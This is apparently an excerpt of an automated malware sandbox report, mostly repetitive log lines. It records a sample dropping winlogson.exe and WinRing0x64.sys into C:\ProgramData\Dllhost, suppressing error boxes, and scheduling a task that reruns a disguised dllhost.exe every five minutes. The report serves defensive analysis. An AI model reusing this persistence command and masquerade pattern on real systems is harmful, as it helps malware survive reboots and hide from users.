                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
